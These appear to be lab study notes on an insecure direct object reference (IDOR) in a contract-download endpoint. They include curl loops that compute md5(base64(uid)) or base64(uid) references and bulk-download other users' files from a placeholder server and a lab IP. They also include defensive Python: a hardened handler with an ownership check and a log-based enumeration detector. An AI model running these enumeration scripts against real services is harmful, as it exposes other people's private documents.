- Sometimes web apps hash or encode their object references, making enumeration more difficult, but it may still be possible
- If we visit `/contracts.php` and click on a file it will start downloading the associated file
- If we intercept the request associated with the download, we will see a POST request to `download.php` as shown below ![[images/Pasted image 20260111191326.png]]
- Here the POST request to `download.php` has the following hashed or encoded payload
```text
contract=cdd96d3cc73d1dbdaffa03cc6cd7339b
```
- Using a `download.php` script to download files is a common practice to avoid directly linking to files, as that may be exploitable with multiple web attacks
- In this case, the web application is not sending the direct reference in cleartext but appears to be hashing it in an `md5` format
- We can attempt to hash various values, like `uid`, `username`, `filename`, etc. to see if any of their `md5` hashes match the above payload's value
- Start with `md5` hashing `uid=1`
```bash
echo -n 1 | md5sum
c4ca4238a0b923820dcc509a6f75849b -
```
- This does not match the intercepted value
- In some advanced cases, we may also utilize `Burp Comparer` and fuzz various values and then compare each to our hash to see if we find any matches
- In this case, the `md5` hash could be for a unique value or a combination of values, which would be very difficult to predict, making this direct reference a `Secure Direct Object Reference`
# Function Disclosure
- Because most modern web apps are developed using JavaScript frameworks, like `Angular`, `React`, or `Vue.js`, many web devs may make the mistake of performing sensitive functions on the front-end, which would expose them to attackers
- For example, if the above hash was being calculated on the front-end, we can study the function and then replicate what it's doing to calculate the same hash
- If we look at the link to the file in the source code, we can see that it is calling a JavaScript function with `javascript:downloadContract('1')`
- If we look at the `downloadContract()` function in the source code we will see that
```javascript
// Front-end function found in the page source. It assumes the page loads
// jQuery with the $.redirect plugin and CryptoJS.
function downloadContract(uid) {
    $.redirect("/download.php", {
        // the "hashed" reference is just md5(base64(uid)), computable by anyone
        contract: CryptoJS.MD5(btoa(uid)).toString(),
    }, "POST", "_self");
}
```
- Here, the value being md5 hashed is `btoa(uid)`, which is the `base64` encoded string of the `uid` variable
- We can check this and compare against the above payload value in the POST request
```bash
echo -n 1 | base64 -w 0 | md5sum
cdd96d3cc73d1dbdaffa03cc6cd7339b -
```
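The two findings above (the reference is `md5(base64(uid))`, and the only thing protecting the file is that scheme) are worth turning into a review check and a contrasting design. The Python below is an added example, not code from the notes or the target application: it reproduces the disclosed scheme to confirm the intercepted value and to test how predictable a reference is, then shows an assumed hardened shape for `download.php` in which references are random opaque tokens stored server-side and the handler still checks that the contract belongs to the logged-in user. `CONTRACTS`, `REFERENCE_TABLE`, `issue_reference` and `resolve_download` are hypothetical names with constructed sample data.

```python
import base64
import hashlib
import secrets

# Reference value seen in the intercepted POST to download.php (taken from the notes above).
OBSERVED_REF = "cdd96d3cc73d1dbdaffa03cc6cd7339b"


def weak_reference(uid):
    """Replicates the disclosed front-end scheme: md5(base64(uid)) as a hex string."""
    encoded = base64.b64encode(str(uid).encode()).decode()
    return hashlib.md5(encoded.encode()).hexdigest()


def predictable_uid(ref, max_uid=100):
    """Review check: does the reference fall out of a small uid range?
    Returns the matching uid if the scheme is predictable, else None."""
    for uid in range(1, max_uid + 1):
        if weak_reference(uid) == ref:
            return uid
    return None


# --- Hardened design (assumed shape, not the page's application) -------------
# 1. The reference is a random opaque token stored server-side, so nothing about
#    the uid can be derived from it and no front-end code can compute it.
# 2. download.php must still check that the object belongs to the logged-in user;
#    an unguessable reference on its own is not an authorization check.

# Constructed sample data: contract uid -> owner and file name.
CONTRACTS = {
    1: {"owner": "alice", "file": "contract_1.pdf"},
    2: {"owner": "bob", "file": "contract_2.pdf"},
}
REFERENCE_TABLE = {}  # opaque token -> contract uid (would be a DB table in practice)


def issue_reference(uid):
    """Mint a fresh 256-bit random reference for a contract the server knows about."""
    if uid not in CONTRACTS:
        raise KeyError(uid)
    token = secrets.token_urlsafe(32)
    REFERENCE_TABLE[token] = uid
    return token


def resolve_download(ref, session_user):
    """Server-side handler: map the token back to the contract, then enforce ownership."""
    uid = REFERENCE_TABLE.get(ref)
    if uid is None:
        return None                      # unknown reference
    if CONTRACTS[uid]["owner"] != session_user:
        return None                      # IDOR stops here: not the caller's object
    return CONTRACTS[uid]["file"]


if __name__ == "__main__":
    print("observed ref maps to uid", predictable_uid(OBSERVED_REF))
    ref = issue_reference(1)
    print("alice ->", resolve_download(ref, "alice"), "| bob ->", resolve_download(ref, "bob"))
```

The ownership check in `resolve_download` is the part that actually closes the IDOR; the opaque token only removes the enumeration shortcut, which is why the check is kept even when references are unguessable.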
# Mass Enumeration
- As with the previous section, we can write a simple BASH script to retrieve all employee contracts
- First, we can calculate hashes for the base64 version of the first 10 `uids`
```bash
for i in {1..10}; do echo -n "$i" | base64 -w 0 | md5sum | tr -d ' -'; done
```
- Second, we can create a BASH script that makes a POST request to `download.php` with each of the above values
```bash
#!/bin/bash
# For uid 1..10, compute md5(base64(uid)), POST it as the contract parameter and
# save each response under the server-supplied filename (-O -J).
# SERVER_IP:PORT is a placeholder for the target.
for i in {1..10}; do
    hash=$(echo -n "$i" | base64 -w 0 | md5sum | tr -d ' -')
    curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php
done
```
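From the server side, the loop above has a very recognisable shape: one client hitting `download.php` with many distinct `contract` values in a few seconds, most of which return an empty body. The Python below is an added example, not part of the notes: it parses constructed Apache-style access-log lines and flags any client that presents at least `threshold` distinct references to `download.php` inside a sliding time window, reporting how many of those responses were empty. The sample uses the GET form (`?contract=`) from the exercise because a POST body does not appear in a standard access log; for the POST variant the same logic would run over application or WAF logs that record the parameter. All IPs, timestamps and sizes are constructed.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlparse

# Apache combined format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m["path"])
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": url.path,
        "ref": parse_qs(url.query).get("contract", [None])[0],
        "status": int(m["status"]),
        "size": 0 if m["size"] == "-" else int(m["size"]),
    }


def detect_enumeration(lines, window=timedelta(seconds=60), threshold=10):
    """Flag clients presenting >= threshold distinct contract references to
    /download.php within any `window`; returns {ip: {distinct_refs, empty_responses}}."""
    events = [e for e in map(parse_line, lines)
              if e and e["path"] == "/download.php" and e["ref"] is not None]
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)

    alerts = {}
    for ip, evs in by_ip.items():
        best, start = None, 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:   # slide window start
                start += 1
            span = evs[start:end + 1]
            distinct = len({e["ref"] for e in span})
            if distinct >= threshold and (best is None or distinct > best["distinct_refs"]):
                best = {"distinct_refs": distinct,
                        "empty_responses": sum(1 for e in span if e["size"] == 0)}
        if best:
            alerts[ip] = best
    return alerts


def _line(ip, ts, ref, size):
    """Build one constructed access-log line for the sample below."""
    return (f'{ip} - - [{ts} +0000] "GET /download.php?contract={ref} HTTP/1.1" '
            f'200 {size} "-" "curl/8.5.0"')


# Constructed sample: a normal user fetching two contracts 22 minutes apart, one
# unparseable line, and one client walking base64(uid) for uid 1..12 in 12 seconds
# where only the first reference corresponds to a real file.
SAMPLE_LOG = [
    '198.51.100.20 - - [11/Jan/2026:19:10:05 +0000] "GET /contracts.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    _line("198.51.100.20", "11/Jan/2026:19:10:09", "MQ==", 48213),
    _line("198.51.100.20", "11/Jan/2026:19:32:40", "Mg==", 47790),
    "this line is not an access-log record",
] + [
    _line("203.0.113.7", f"11/Jan/2026:19:48:{i:02d}",
          base64.b64encode(str(i + 1).encode()).decode(), 48213 if i == 0 else 0)
    for i in range(12)
]

if __name__ == "__main__":
    for ip, info in detect_enumeration(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {info['distinct_refs']} distinct refs, "
              f"{info['empty_responses']} empty responses")
```

The empty-response count is the second signal worth keeping in the alert: legitimate users ask for references the server actually hands out, so a run of zero-byte downloads from one client is a stronger indicator than volume alone.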
# Exercise
- `ping` test ![[images/Pasted image 20260111192810.png]]
- `nmap` scan ![[images/Pasted image 20260111192855.png]]
- visit `/contracts.php`
- having issues again visiting the web page ![[images/Pasted image 20260111193640.png]]
- source code ![[images/Pasted image 20260111193740.png]] ![[images/Pasted image 20260111193049.png]]
- Intercept the download ![[images/Pasted image 20260111193755.png]]
- Forward ![[images/Pasted image 20260111193833.png]]
- it looks like we only have to base64 encode the `uid`
- create a BASH script to snag files for first 20 `uids`
```bash
#!/bin/bash
# For uid 1..20, send base64(uid) as the contract parameter and save each
# response under the server-supplied filename (-O -J)
for i in {1..20}; do
    b64=$(echo -n "$i" | base64 -w 0)
    curl -sOJ "http://83.136.255.170:33816/download.php?contract=$b64"
done
```
- after running we have below files in the local directory ![[images/Pasted image 20260111194901.png]]
- only one is not 0-sized, so `cat` that file